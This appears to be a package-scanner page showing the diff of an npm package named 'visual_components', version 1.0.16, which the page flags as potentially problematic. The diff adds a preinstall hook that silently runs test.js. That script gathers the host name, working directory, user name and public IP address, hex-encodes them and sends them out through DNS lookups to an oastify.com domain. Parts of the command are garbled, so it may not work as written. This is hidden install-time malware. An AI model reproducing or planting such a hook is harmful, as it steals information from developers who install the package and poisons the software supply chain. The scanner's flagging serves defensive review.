visual_components 1.0.16

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of visual_components might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/package.json +11 -0
  2. package/test.js +10 -0
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "visual_components",
3
+ "version": "1.0.16",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": { "preinstall": "node test.js > /dev/null 2>&1",
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
11
+ }
package/test.js ADDED
@@ -0,0 +1,10 @@
1
+ const { exec } = require("child_process");
2
+ exec("a=$(hostname;pwd;whoami;curl https://ifconfig.me;) && echox $a | xxd -p | head | while read ut;do nslookup
3
+ $3fjj9pxonckxvtuqcb8x2ibm6dc40xom.oastify.com;done",
4
+ (error, data, getter) => {
5
+ if(error){
6
+ console.log("error",error.message);
7
+ return;
8
+ } if(getter){
9
+ console.log(data); return;} console.log(data);
10
+ });